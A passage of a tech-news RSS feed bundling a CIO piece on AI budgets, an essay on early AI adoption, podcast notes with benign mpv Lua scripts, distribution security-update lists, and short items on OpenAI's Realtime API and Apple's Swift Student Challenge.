https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=854%2C480&amp;quality=50&amp;strip=all 854w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=640%2C360&amp;quality=50&amp;strip=all 640w, https://b2b-contenthub.com/wp-content/uploads/2026/02/amit-basu-stylized_1600x900px.jpg?resize=444%2C250&amp;quality=50&amp;strip=all 444w" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Amit Basu, VP, CIO, and CISO, International Seaways</p>
</figcaption></figure><p class="imageCredit">International Seaways</p></div>



<p>Most existing KPIs measure output and delivery, as opposed to learning velocity, model maturity, and risk discovery, which Basu says are often more valuable than short-term delivery speed. “Without adapting budget discipline to recognize and reward learning, organizations risk slowing real progress while appearing to move fast.”</p>



<p>Consequently, pilots that generate meaningful insights or reduce future risk, but don’t deliver immediate ROI, are <a href="https://www.cio.com/article/4114010/2026-the-year-ai-roi-gets-real.html">often labeled as failures</a>, Basu says.</p>



<p>That makes the CIO’s challenge “less about sacrificing existing programs and more about being asked to move faster than the organization is ready to do responsibly,” Basu says. “This creates a different tension for CIOs and CISOs: balancing speed with control, innovation with resilience, and executive expectations with regulatory and operational realities. In some cases, the greater risk is not which projects are put on hold, but whether AI is being introduced without adequate guardrails and long-term sustainability.”</p>



<p>IC Realtime’s Nassar agrees, saying that, even as a digital video surveillance company that is comfortable using technology, the risk with AI factors into his decision-making, and <a href="https://www.cio.com/article/3984527/how-to-establish-an-effective-ai-grc-framework.html">AI governance</a> will be front and center this year.</p>



<p>“We’ve hurt ourselves a lot through the years with projects” being on the bleeding edge, Nassar explains, which is why “we have been a little hesitant to go crazy experimental on any of these tools or services.” Instead, they “take it easy,” and look at operational cost reductions and efficiency improvements.</p>



<p>Basu says that rather than diverting budget away from existing initiatives to fund AI, many AI projects require IT to first prioritize investments in infrastructure, data platforms, and security to make those initiatives viable.</p>



<p>In International Seaways’ case, this has occasionally meant pausing or slowing AI use cases, “not because of lack of ambition or funding, but because proceeding without the right foundations would introduce unacceptable operational or cyber risk,” he notes. “In that sense, AI has acted as a forcing function, helping the organization make long-needed investments that ultimately strengthen the broader technology and risk posture, not just the AI program itself.”</p>



<h2 class="wp-block-heading">Vendor consolidation and tool stack reduction</h2>



<p>The advent of AI has also meant organizations are having to <a href="https://www.cio.com/article/4035430/6-key-strategies-when-consolidating-vendors.html">consolidate vendors</a> and <a href="https://www.cio.com/article/657832/cios-sharpen-cloud-cost-strategies-just-as-gen-ai-spikes-loom.html">renegotiate contracts</a>, says Twisted Consulting’s Williams.</p>



<p>“Leaders are aggressively trimming overlapping tools, reducing license counts, or delaying renewals to carve out room for AI platforms or services,” she says. “In some cases, AI spend is justified by positioning it as a replacement for manual work that was previously ‘absorbed’ by already-stretched teams.”</p>



<p>Nassar says he’s been able to leverage his existing tool stack for AI projects, and if need be, increase subscriptions slightly. The strategy is to start small and once a pilot proves itself, scale and spend to add new features.</p>



<p>About 5% to 10% of Nassar’s budget will be devoted to AI this year — and that will probably double or triple next year, he says.</p>



<p>Helium SEO’s DeMott has gone further and “aggressively” reduced the company’s software tool stack as well as consolidated tools, which reduced subscription costs by about 40%. “That savings was [directed] into AI platform spending and more headcounts of engineers,” DeMott says. He has also renegotiated contracts with current vendors to get better rates.</p>



<p>Nassar says the fast pace of AI is creating a curveball. “We don’t know what tools will come next week. That’s the scary part for me,” he says. “You’ve got a <a href="https://www.computerworld.com/article/4116179/anthropic-releases-cowork-claude-code-directly-on-your-computer.html">new coworker from Claude Anthropic</a> that got launched, and it’s put a lot of pressure on us to make sure that we understand these systems.”</p>



<p>But even as some IT leaders are being methodical when it comes to AI funding decisions, Nassar doesn’t ignore the fact that AI is ramping up. “I don’t think there’s a choice anymore,” he says. “This is the biggest capital expenditure the human race has ever seen.”</p>



<p>The budget decisions CIOs are making aren’t being done lightly, says Williams. “Most CIOs know they’re trading short-term stability for long-term capability. But there’s a growing consensus that delaying AI entirely is a bigger risk than postponing other initiatives,” she says. “Falling behind on AI now creates a gap that’s far more expensive and disruptive to close later.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The hidden cost of waiting for best practices in AI adoption]]></title>
<description><![CDATA[For most of my career, I have watched the same pattern repeat. A new technology emerges. Early adopters experiment, struggle and learn in public. Everyone else waits for best practices. By the time those practices are well documented, the competitive advantage has already moved.



AI is followin...]]></description>
<link>https://tsecurity.de/de/3325123/it-security-nachrichten/the-hidden-cost-of-waiting-for-best-practices-in-ai-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3325123/it-security-nachrichten/the-hidden-cost-of-waiting-for-best-practices-in-ai-adoption/</guid>
<pubDate>Wed, 04 Mar 2026 13:06:33 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For most of my career, I have watched the same pattern repeat. A new technology emerges. Early adopters experiment, struggle and learn in public. Everyone else waits for best practices. By the time those practices are well documented, the competitive advantage has already moved.</p>



<p>AI is following that exact script. Only this time, the cost of waiting is far higher.</p>



<p>When people talk about AI risk, they usually focus on model errors, data exposure or governance gaps. Those are real concerns. But the bigger, quieter cost is competitive erosion. Brand relevance declines. Profitability compresses. Executive credibility weakens. Entire business models become vulnerable to disruption from outside the industry.</p>



<p>I have seen this movie before. Many times.</p>



<p>Early in my career, I watched Wells Fargo become the first major bank to launch online banking at scale. At the time, most other financial institutions were still debating whether customers would even trust digital transactions.  Wells Fargo did not wait for best practices. They created them.</p>



<p>While competitors hesitated, Wells Fargo built a reputation as a technology leader. Their brand perception shifted. Customer expectations shifted with it. And every other financial institution I worked with suddenly found themselves in a permanent state of catch-up.</p>



<p>Those banks were not incompetent. They were cautious. They were waiting for standards, frameworks and peer validation. By the time they moved, Wells Fargo had already claimed mindshare, trust and operational maturity.</p>



<p>That experience shaped how I view every technology wave since.</p>



<p>The same pattern repeated with:</p>



<ul class="wp-block-list">
<li>Hotels watching Airbnb redefine trust and access to lodging</li>



<li>Banks watching Venmo and Zelle redefine money movement</li>



<li>Telecom companies watching smartphones eliminate landlines</li>



<li>Media companies watching streaming replace physical distribution</li>
</ul>



<p>In each case, the organizations that waited for best practices did not just lose time. They lost positioning.</p>



<p>AI is no different. The only difference is speed.</p>



<h2 class="wp-block-heading">The executive cost no one talks about</h2>



<p>Most AI discussions focus on organizational risk. Few talk about executive risk.</p>



<p>As a CIO or CISO, your value is not measured only by stability. It is measured by relevance.</p>



<p>Boards, CEOs and investors increasingly associate leadership credibility with the ability to navigate AI responsibly and strategically. When peers are building internal copilots, optimizing operations and improving decision velocity, the leaders who are still “evaluating” begin to look out of step.</p>



<p>This is not about hype. It is about optics, influence and trust.</p>



<p>Executives who adopt AI early gain:</p>



<ul class="wp-block-list">
<li>Strategic fluency in how AI actually behaves in real environments</li>



<li>Practical experience with governance tradeoffs</li>



<li>Credibility in board and peer conversations</li>



<li>Confidence in shaping policy instead of reacting to it</li>
</ul>



<p>Executives who wait inherit other people’s playbooks and other people’s mistakes.  Over time, that gap becomes visible. Career opportunities follow the leaders who demonstrated foresight, not the ones who demonstrated caution.  AI adoption is not just a technology shift. It is an economic one.</p>



<p>Organizations that optimize early gain:</p>



<ul class="wp-block-list">
<li>Lower operating costs through automation</li>



<li>Faster cycle times</li>



<li>Higher employee leverage</li>



<li>Better customer responsiveness</li>



<li>Improved margin resilience</li>
</ul>



<p>Competitors who delay must eventually adopt the same tools simply to remain viable. But they do so under margin pressure, not advantage.  This creates a structural profitability squeeze. Early adopters improve margins. Late adopters defend margins. The difference compounds over time.  McKinsey has repeatedly shown that <a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-state-of-ai" rel="nofollow">AI leaders outperform laggards in profitability and revenue growth</a>, not because the models are better, but because the organizations learned faster.</p>



<p>Once margins compress, every future investment becomes harder. Innovation slows. Risk tolerance declines. Talent migrates.  Waiting does not preserve profitability. It slowly erodes it.  One of the most dangerous assumptions in business is that disruption will come from within your industry.</p>



<p>Hotels did not expect Airbnb. Taxi companies did not expect Uber. Banks did not expect fintech wallets. Media companies did not expect YouTube.  AI lowers the barrier to entry across industries. A small, AI-native company can now operate with scale, efficiency and insight that previously required massive infrastructure.</p>



<p>This means new competitors can emerge with:</p>



<ul class="wp-block-list">
<li>No legacy systems</li>



<li>No cultural resistance</li>



<li>No process debt</li>



<li>No governance baggage</li>
</ul>



<p>They will not ask how your industry works. They will ask how it could work.  If your organization is still waiting for AI best practices, someone else is building the next version of your business model.</p>



<h2 class="wp-block-heading">Best practices are a lagging indicator</h2>



<p>Best practices are valuable. They are also backward-looking.  They describe what worked after it already worked.  If Wells Fargo had waited for best practices in online banking, someone else would have written them.  If Airbnb had waited for best practices in peer-to-peer lodging, the industry would not exist.  If Venmo had waited for best practices in consumer payments, wire transfers would still dominate.  Best practices are created by organizations willing to experiment under uncertainty.</p>



<p>AI best practices will not protect your competitive position. They will document someone else’s success.  Many leaders believe waiting is the safer path. In reality, it is simply the quieter risk.  AI experimentation done responsibly creates learning. Waiting creates ignorance.  I have watched organizations delay AI adoption in the name of governance, only to later deploy rushed, poorly understood implementations under competitive pressure. That path produces more risk, not less.  The organizations that are safest with AI are not the ones that waited. They are the ones who learned early.</p>



<p><a href="https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/" rel="nofollow">OWASP</a> and <a href="https://www.nist.gov/itl/ai-risk-management-framework" rel="nofollow">NIST</a> both emphasize that responsible AI maturity comes from iterative learning, not theoretical governance alone.</p>



<p>Frameworks help. Experience matters more.  Customers may not ask if you use AI. But they feel when you do not.  They feel it in response time. In personalization. In accuracy. In engagement. In product evolution.  Brands that leverage AI appear modern, responsive and adaptive. Brands that do not quietly feel outdated.  This does not happen overnight. It happens slowly. Then suddenly.</p>



<p>Blockbuster did not collapse in a single year. It declined while Netflix built trust and habit. By the time the shift was obvious, it was irreversible.  Brand erosion is rarely loud. It is just permanent.</p>



<p>I will say this directly, because most articles will not.</p>



<p>Executives who avoid AI today are quietly reducing their future relevance.  Not because AI replaces them. But because leaders who understand AI will replace leaders who do not.  Boards do not need technical experts. They need leaders who can translate complexity into strategy.  If you are not building that muscle now, someone else is.</p>



<h2 class="wp-block-heading">What acting now actually means</h2>



<p>Acting now does not mean reckless deployment. It means:</p>



<ul class="wp-block-list">
<li>Piloting controlled use cases</li>



<li>Learning how data flows through models</li>



<li>Understanding where governance breaks</li>



<li>Observing human behavior with AI tools</li>



<li>Building internal literacy</li>



<li>Creating feedback loops</li>



<li>Developing institutional intuition</li>
</ul>



<p>This is how best practices are born.  You do not need perfection. You need momentum.</p>



<h2 class="wp-block-heading">The call to action</h2>



<p>If you are a CIO or CISO waiting for best practices before acting on AI, I would challenge you to reconsider the risk you are actually taking.</p>



<p>You are risking:</p>



<ul class="wp-block-list">
<li>Competitive positioning</li>



<li>Profitability trajectory</li>



<li>Brand relevance</li>



<li>Organizational learning</li>



<li>And your own executive relevance</li>
</ul>



<p>The leaders who will define the next decade are not waiting for permission. They are building understanding.  AI is not the next software upgrade. It is the next operating model.  The question is not whether best practices will emerge. They will.  The question is whether your organization will help write them or quietly read them later.</p>



<p>If there is one lesson my career has reinforced repeatedly, it is this: The future rarely rewards those who wait to be certain.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4585: mpv util scripts]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


sorry about the computer fan i didnt realize how loud it was until after everything was recorded


all scripts are prefixed with a_ for personal organization






_a_props.lua


mp.observe_property("path", "native", function()
local domain...]]></description>
<link>https://tsecurity.de/de/3313472/podcasts/hpr4585-mpv-util-scripts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3313472/podcasts/hpr4585-mpv-util-scripts/</guid>
<pubDate>Fri, 27 Feb 2026 01:01:53 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
sorry about the computer fan i didnt realize how loud it was until after everything was recorded</p>

<p>
all scripts are prefixed with a_ for personal organization</p>

<p>

</p>

<p>
_a_props.lua</p>

<pre data-language="plain">
mp.observe_property("path", "native", function()
local domain = string.match(mp.get_property_native("path") or "", ".*://w*%.*(.-)[:/]")
if domain then mp.set_property("user-data/domain-path", domain)
else mp.del_property("user-data/domain-path") end
end)

mp.observe_property("playtime-remaining", "native", function (_, tr)
if tr then mp.set_property("user-data/playtime-remaining-seconds", math.floor(tr)) end
end)
</pre>

<p>

</p>

<p>
a_aspectratio.lua</p>

<pre data-language="plain">
local targetw = 16
local targeth = 9
local marginerror = 0.1


local function resetgem()
local dim = mp.get_property_native("osd-dimensions")
if not dim or dim.w == 0 then return end
mp.set_property("geometry", dim.w .. "x" .. dim.h)
end

local function dimensionhop(_, dim)
if dim.w == 0 or dim.h == 0 then return end

local cd = dim.w / dim.h
local td = targetw / targeth

-- floating points my beloved
-- checking we're in a good range so it doesnt inf loop
-- also it updates the geometry field so profile restore can work
if cd &gt; (td - marginerror) and cd &lt; (td + marginerror) then resetgem(); return end

local setw = dim.h * td
local newdim = setw .. "x" .. dim.h
mp.set_property("geometry", newdim)
mp.osd_message("setting " .. newdim)
end

mp.observe_property("osd-dimensions", "native", dimensionhop)

mp.register_event("start-file", resetgem)
mp.register_event("end-file", resetgem)
</pre>

<p>

</p>

<p>
a_cover-visualiser.lua</p>

<pre data-language="plain">
local function resolve_missing_cover(domain)
local extico = {
["hub.hackerpublicradio.org"] = "https://hackerpublicradio.org/images/hpr_logo.png",
["yellowtealpurple.net"] = "https://yellowtealpurple.net/forums/data/assets/logo/favicon-32x32.png",
-- yes using a product picture is silly but so is not featuring your icon ANYWHERE else
["anonradio.net"] = "https://sdf.org/store/thumbs/anon3.jpg",
["hashnix.club"] = "default",
["radio.kingposs.com"] = "https://kingposs.com/assets/buttons/PossBadge.gif"
}

if domain then
local force = extico[domain]
if force == "default" then return resolve_missing_cover() end
if force and mp.commandv("video-add", force, "auto", "domainhardcode.png") then return end

local favico = "https://" .. domain .. "/favicon.ico"
if mp.commandv("video-add", favico, "auto", "favico.png") then return end
end

mp.command("video-add ~~/cover.png auto default.png")
end

local function inject_needed()
local tracks = mp.get_property_native("track-list")
local needed = true

for _, v in ipairs(tracks) do
if v.type == 'video' then
if not v.image then return end
needed = false
end
end

if needed then resolve_missing_cover(mp.get_property_native("user-data/domain-path")) end

mp.set_property("file-local-options/lavfi-complex",
"[aid1] asplit=3 [a0][a1][ao] ; " ..
"[vid1] scale=sws_dither=none:flags=neighbor:w=max(iw\,256):h=max(iw\,256):force_original_aspect_ratio=increas
e:force_divisible_by=8, scale=h=-1:w=720, split=3 [vref0][vref1][vfin] ; " ..

"[a0] showfreqs=size=hd720, hue=h=220 [rawfreq] ; " ..
"[rawfreq][vref0] scale=flags=neighbor:w=rw:h=rh/2 [freq] ; " ..
"[a1] showvolume=f=0.5:h=14 [rawvol] ; [rawvol][vref1] scale=flags=neighbor:w=(3*rw)/4:h=-1, geq=p(X\,Y):a=255
[vol] ; " ..
"[vfin][freq] overlay=y=main_h-overlay_h [prevo] ; [prevo][vol] overlay [vo] ")
end

-- mp.register_event("start-file", inject_needed)
-- mp.observe_property("current-tracks/audio", "native", inject_needed)
mp.add_hook("on_preloaded", 50, inject_needed)
</pre>

<p>

</p>

<p>
my cover.png (640x480)</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4585/hpr4585_image_1.png">
<img src="https://hackerpublicradio.org/eps/hpr4585/hpr4585_image_1_tn.png">
</a>

</p>

<p>

</p>

<p>
example with hardcoded image</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4585/hpr4585_image_2.png">
<img src="https://hackerpublicradio.org/eps/hpr4585/hpr4585_image_2_tn.png">
</a>

</p>

<p>
(notice theres only one volume bar because hpr is mixed to mono)</p>

<p>

</p>

<p>
example with favicon detection</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4585/hpr4585_image_3.png">
<img src="https://hackerpublicradio.org/eps/hpr4585/hpr4585_image_3_tn.png">
</a>

</p>

<p>
(youll probably see this one a lot since its the default icon for icecast servers)</p>

<p>

</p>

<p>
example with default/no cover</p>

<p>

<a href="https://hackerpublicradio.org/eps/hpr4585/hpr4585_image_4.png">
<img src="https://hackerpublicradio.org/eps/hpr4585/hpr4585_image_4_tn.png">
</a>

</p>

<p>
(my art!!)</p>

<p>

</p>

<p>
a_playlist.lua</p>

<pre data-language="plain">
mp.register_script_message("full-clear", function()
mp.set_property("playlist-pos", -1)
mp.command("playlist-clear")
end)

mp.register_script_message("playlist-next-to-last", function()
local target = mp.get_property_native("playlist-pos")
if target &lt; 0 then return end
target = target + 1
mp.osd_message("moved " .. mp.get_property_native("playlist/" .. target .. "/filename"))
mp.commandv("playlist-move", target, 999)
end)
</pre>

<p>

</p>

<p>
a_rcfill.lua</p>

<pre data-language="plain">
-- relative cache refill
-- sets cache-pause-wait based on how fast the playback and download speed is

local function set_pause(_, incache)
if not incache then return end

-- rate of bytes incoming
local ds = mp.get_property_native("cache-speed")
if not ds then return end

-- rate of bytes consumed * 2
local kbc = (mp.get_property_native("audio-bitrate") or 0) + (mp.get_property_native("video-bitrate") or 0)
kbc = (kbc/8) * (mp.get_property_native("speed") or 1) * 3

local secs = math.min(kbc/ds, 20)
if secs &lt; 1 then secs = 2 end

mp.set_property("file-local-options/cache-pause-wait", secs)
mp.osd_message("buffering " .. math.floor(secs) .. " secs...")
end

local function jump_to_ecache(amt)
if not amt then return end
local endtime = mp.get_property_native("demuxer-cache-time")
if not endtime then return end
mp.commandv("seek", endtime - amt, "absolute")
mp.osd_message("jumped to realtime-" .. amt .. "s")
end


mp.observe_property("paused-for-cache", "native", set_pause)
mp.register_script_message("jump-to-ecache", jump_to_ecache)
</pre>

<p>

</p>

<p>
a_titlebar.lua</p>

<pre data-language="plain">
mp.set_property("user-data/dynatitle-default", mp.get_property("title") or "mpv")


local function title_update()
if not mp.get_property_native("media-title") then
mp.set_property("title", mp.get_property_native("user-data/dynatitle-default"))
return
end

local pl = mp.get_property_native("playlist-pos")
if pl ~= -1 then pl = mp.get_property_native("playlist-count") - pl - 1 end

local tr = mp.get_property_native("playtime-remaining")
if not tr then
-- file currently loading
-- since this is a slow changing value, we can just set this literally
local disp = ""
if pl ~= -1 then
disp = "( " .. pl .. " files remaining )"
end
mp.set_property("title", "loading ${media-title} " .. disp)
return
end


local progress = "${percent-pos} "
if tr &lt; 100 then
local emg = "-"
if pl &lt; 1 then emg = "-!" end
progress = emg .. "${user-data/playtime-remaining-seconds} "
end

if mp.get_property_native("paused-for-cache") then
progress = "B${cache-buffering-state} "
end

local netspeed = ""
if mp.get_property_native("demuxer-via-network") then
netspeed = "${cache-speed} "
end

local domainlabel = ""
if mp.get_property_native("user-data/domain-path") then
domainlabel = "via ${user-data/domain-path} "
end


mp.set_property("title", "${?pause==yes:P}" .. progress .. netspeed .. "${media-title} " .. domainlabel)
end

mp.observe_property("percent-pos", "native", title_update)
mp.observe_property("cache-buffering-state", "native", title_update)
mp.register_event("start-file", title_update)
mp.register_event("end-file", title_update)
mp.register_event("playback-restart", title_update)
mp.add_periodic_timer(5, title_update)
</pre>

<p>

</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4585/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (grafana and grafana-pcp), Debian (gnutls28), Fedora (chromium and yt-dlp), Oracle (389-ds-base, kernel, munge, and openssl), Red Hat (buildah, containernetworking-plugins, opentelemetry-collector, podman, runc, and skopeo), Slackware (mozilla), SUSE...]]></description>
<link>https://tsecurity.de/de/3309923/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3309923/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 25 Feb 2026 15:20:39 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (grafana and grafana-pcp), <b>Debian</b> (gnutls28), <b>Fedora</b> (chromium and yt-dlp), <b>Oracle</b> (389-ds-base, kernel, munge, and openssl), <b>Red Hat</b> (buildah, containernetworking-plugins, opentelemetry-collector, podman, runc, and skopeo), <b>Slackware</b> (mozilla), <b>SUSE</b> (chromium, cosign, firefox, freerdp, gimp, heroic-games-launcher, kernel, libopenssl-3-devel, libxml2, libxslt, mosquitto, openqa, os-autoinst, openqa-devel-container, openvswitch, phpunit, postgresql14, postgresql15, postgresql16, protobuf, python310, python311-PyPDF2, python36, snpguest, warewulf4, and weblate), and <b>Ubuntu</b> (curl, kernel, linux, linux-gcp, linux-gke, linux-gkeop, linux-intel-iotg, linux-intel-iotg-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia-tegra, linux-oracle, linux-xilinx-zynqmp, linux, linux-gkeop, linux-hwe-6.8, linux-lowlatency, linux-lowlatency-hwe-6.8, linux-oracle, linux-raspi, linux-fips, linux-fips, linux-gcp-fips, linux-gcp, linux-gcp-6.8, linux-gke, linux-oracle-6.8, linux-gcp-fips, linux-ibm, linux-ibm-6.8, linux-intel-iot-realtime, linux-realtime, linux-raspi-realtime, linux-realtime, linux-realtime-6.8, and linux-xilinx).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Wednesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (ceph, gimp, gnutls28, and libpng1.6), Fedora (freerdp, libpng, libssh, mingw-libpng, mingw-libsoup, mingw-python3, pgadmin4, python-pillow, thunderbird, and vim), Mageia (postgresql15), Red Hat (python-urllib3), SUSE (cdi-apiserver-container, cdi-clone...]]></description>
<link>https://tsecurity.de/de/3295640/linux-tipps/security-updates-for-wednesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3295640/linux-tipps/security-updates-for-wednesday/</guid>
<pubDate>Wed, 18 Feb 2026 15:06:38 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (ceph, gimp, gnutls28, and libpng1.6), <b>Fedora</b> (freerdp, libpng, libssh, mingw-libpng, mingw-libsoup, mingw-python3, pgadmin4, python-pillow, thunderbird, and vim), <b>Mageia</b> (postgresql15), <b>Red Hat</b> (python-urllib3), <b>SUSE</b> (cdi-apiserver-container, cdi-cloner-container, cdi- controller-container, cdi-importer-container, cdi-operator-container, cdi- uploadproxy-container, cdi-uploadserver-container, cont, frr, gpg2, kubernetes, kubernetes-old, libsodium, libsoup-2_4-1, libssh, libtasn1, libxml2, nodejs22, openCryptoki, openssl-3, and python311-pip), and <b>Ubuntu</b> (frr, linux-aws, linux-aws-6.8, linux-gkeop, linux-nvidia, linux-nvidia-6.8, linux-oracle, linux-oracle-6.8, linux-aws-fips, linux-fips, linux-gcp-5.15, linux-kvm, linux-oracle, linux-oracle-5.15, linux-gcp-fips, linux-nvidia, linux-nvidia-tegra-igx, linux-oem-6.17, linux-realtime, linux-raspi-realtime, nova, and pillow).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (brotli, git-lfs, image-builder, kernel, keylime, libsoup3, and pcs), Fedora (chromium, gnutls, osslsigncode, and p11-kit), Mageia (golang, libpng, thunderbird, and xrdp), Red Hat (git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb...]]></description>
<link>https://tsecurity.de/de/3284254/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3284254/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 12 Feb 2026 15:22:03 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (brotli, git-lfs, image-builder, kernel, keylime, libsoup3, and pcs), <b>Fedora</b> (chromium, gnutls, osslsigncode, and p11-kit), <b>Mageia</b> (golang, libpng, thunderbird, and xrdp), <b>Red Hat</b> (git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, osbuild-composer, and toolbox), <b>Slackware</b> (gnutls and libpng), <b>SUSE</b> (apptainer, cockpit, cockpit-packages, cockpit-subscriptions, freerdp2, gimp, glib2, go, go1.24, go1.25, gpg2, ImageMagick, java-1_8_0-openjdk, kernel, keylime-config, keylime-ima-policy, lemon, libp11-kit0, libsoup, libsoup-2_4-1, libxml2, libxml2-16, munge, nodejs20, nvidia-modprobe.cuda, nvidia-open-driver-G06-signed, nvidia-persistenced.cuda, openQA, orthanc, gdcm, orthanc-authorization,, python-brotlipy, python-Django, python-maturin, python-pyasn1, python-urllib3, python-wheel, python313-wheel, qemu, rust-keylime, sqlite3, uriparser, wicked2nm, and xrdp), and <b>Ubuntu</b> (libtasn1-6, libwebsockets, libxmltok, linux, linux-aws, linux-gcp, linux-gke, linux-gkeop, linux-hwe-5.15, linux-ibm, linux-ibm-5.15, linux-lowlatency, linux-lowlatency-hwe-5.15, linux, linux-raspi, linux, linux-raspi, linux-realtime, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-ibm,
 linux-ibm-6.8, linux-lowlatency-hwe-6.8, linux-aws-5.15, linux-gcp-5.15, linux-nvidia-tegra-igx, linux-oracle-5.15,
 linux-xilinx-zynqmp, linux-aws-fips, linux-fips, linux-gcp-fips, linux-gcp, linux-gcp-6.8, linux-gcp-fips, linux-intel-iot-realtime, linux-realtime, linux-nvidia-tegra, linux-nvidia-tegra-5.15, linux-realtime-6.8, linux-xilinx-zynqmp, and python-multipart).]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Realtime API bietet günstigeres Mini-Modell für Echtzeitkommunikation]]></title>
<description><![CDATA[Das öffentliche Release verbessert Audio, Sprache, Debugging und die Developer Experience. Daneben lässt sich eine kostengünstigere Mini-Variante nutzen.]]></description>
<link>https://tsecurity.de/de/3278774/it-nachrichten/openai-realtime-api-bietet-guenstigeres-mini-modell-fuer-echtzeitkommunikation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3278774/it-nachrichten/openai-realtime-api-bietet-guenstigeres-mini-modell-fuer-echtzeitkommunikation/</guid>
<pubDate>Tue, 10 Feb 2026 10:04:25 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das öffentliche Release verbessert Audio, Sprache, Debugging und die Developer Experience. Daneben lässt sich eine kostengünstigere Mini-Variante nutzen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Opens Submissions for 2026 Swift Student Challenge]]></title>
<description><![CDATA[Apple has opened submissions for the 2026 Swift Student Challenge, inviting students worldwide to submit their projects by Saturday, February 28. The annual program gives young developers a chance to show their coding skills by building an interactive app playground using Swift Playgrounds or Xco...]]></description>
<link>https://tsecurity.de/de/3273772/ios-mac-os/apple-opens-submissions-for-2026-swift-student-challenge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3273772/ios-mac-os/apple-opens-submissions-for-2026-swift-student-challenge/</guid>
<pubDate>Sat, 07 Feb 2026 07:36:53 +0100</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has opened submissions for the 2026 Swift Student Challenge, inviting students worldwide to submit their projects by Saturday, February 28. The annual program gives young developers a chance to show their coding skills by building an interactive app playground using Swift Playgrounds or Xcode. The focus stays on learning, creativity, and real-world ideas, not just polished apps.



In a statement shared on its developer news page, Apple said submissions will be judged on projects that “demonstrate excellence in innovation, creativity, social impact, or inclusivity.” A small group of standout participants will earn the title of Distinguished Winners and receive an invitation to visit Apple in Cupertino for three days in summer 2026, with travel and lodging covered.



Distinguished Winners often attend WWDC, Apple’s annual developer conference, which usually takes place in June. While Apple has not confirmed dates for 2026, the event is where the company introduces its next major software updates, including iOS 27 and macOS 27.



Key things to know about the Challenge




No prior coding experience is required if you meet the eligibility rules



The Challenge is free to enter with access to a Mac or iPad



Students can choose any topic they care about



App playgrounds should run for three minutes or less




The Swift Student Challenge remains a clear entry point for students who want to build skills and share ideas through code.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (brotli, curl, kernel, python-wheel, and python3.12), Debian (containerd), Fedora (gnupg2, pgadmin4, phpunit10, phpunit11, phpunit12, phpunit8, phpunit9, and yarnpkg), Mageia (expat), Oracle (qemu-kvm and util-linux), Red Hat (kernel, kernel-rt, open...]]></description>
<link>https://tsecurity.de/de/3255209/linux-tipps/security-updates-for-thursday/</link>
